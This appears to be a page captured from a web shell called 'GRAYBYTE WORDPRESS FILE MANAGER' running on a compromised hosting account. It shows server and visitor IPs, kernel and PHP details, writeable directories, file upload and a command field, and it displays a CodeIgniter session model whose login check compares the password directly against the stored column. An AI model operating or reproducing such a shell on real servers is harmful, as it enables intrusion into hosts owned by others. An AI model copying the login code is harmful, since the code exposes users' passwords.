GRAYBYTE WORDPRESS FILE MANAGER5200

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/public_html/Barga/application/modules/sessions/models/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/public_html/Barga/application/modules/sessions/models//Sessions_model.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
class Sessions_model extends CI_Model
{
	var $table = TABLE_USERS;
	var $table_user_role = TABLE_USER_ROLES;
	public function __construct()
    {
        parent::__construct();
    }
    public function verifyLogin($user_name, $password)
    {
        $query = $this->db->select('*')->where('user_password', $password)->group_start()->where(array('user_email' => $user_name))->or_where(array('user_name' => $user_name))->group_end()->get($this->table);
		return $query;
    }
	
	public function updateUserProfile($data_array, $user_id){	
		$this->db->where('user_id', $user_id);
		$this->db->update($this->table, $data_array);
	}
	

}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 27 2024 00:19:25
giriqfky / giriqfky
0755
Sessions_model.php
0.711 KB
July 27 2024 00:19:25
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF